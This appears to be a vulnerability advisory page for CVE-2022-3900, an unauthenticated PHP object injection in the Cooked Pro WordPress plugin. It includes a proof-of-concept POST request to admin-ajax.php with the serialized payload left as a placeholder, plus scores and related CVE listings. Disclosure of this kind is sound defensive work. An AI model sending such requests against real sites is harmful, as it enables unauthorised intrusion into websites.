Lucene search
Marcin MotwickiWPEX-ID:C969C4BC-82D7-46A0-88BA-E056C0B27DE7HistoryNov 21, 2022 - 12:00 a.m.
Cooked Pro < 1.7.5.7 - Unauthenticated PHP Object Injection
2022-11-2100:00:00
Marcin Motwicki
129
php object injection
cooked pro
unauthenticated access
security vulnerability
web exploit
0.004 Low
EPSS
Percentile
74.0%
The plugin does not properly validate or sanitize the recipe_args parameter before unserializing it in the cooked_loadmore action, allowing an unauthenticated attacker to trigger a PHP Object injection vulnerability.
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 769
Connection: close
action=cooked_loadmore&atts%5Bcategory%5D=false&atts%5Border%5D=false&atts%5Borderby%5D=false&atts%5Bshow%5D=false&atts%5Bsearch%5D=true&atts%5Bpagination%5D=true&atts%5Bcolumns%5D=3&atts%5Blayout%5D=modern&atts%5Bauthor%5D=&atts%5Bcompact%5D=false&atts%5Bhide_browse%5D=false&atts%5Bhide_sorting%5D=false&atts%5Bexclude%5D=false&atts%5Binline_browse%5D=false&atts%5Bcuisine%5D=false&atts%5Bcooking-method%5D=false&atts%5Btag%5D=false&recipe_args=<SERIALIZED_PHP_OBJECT>&page=1&is_own_profile=Related
cve
cve
CVE-2022-3900
2022-12-12 18:15:11
prion
prion
Design/Logic Flaw
2022-12-12 18:15:00
nvd
nvd
CVE-2022-3900
2022-12-12 18:15:11
cvelist
cvelist
CVE-2022-3900 Cooked Pro < 1.7.5.7 - Unauthenticated PHP Object Injection
2022-12-12 17:57:08
wpvulndb
wpvulndb
Cooked Pro < 1.7.5.7 - Unauthenticated PHP Object Injection
2022-11-21 00:00:00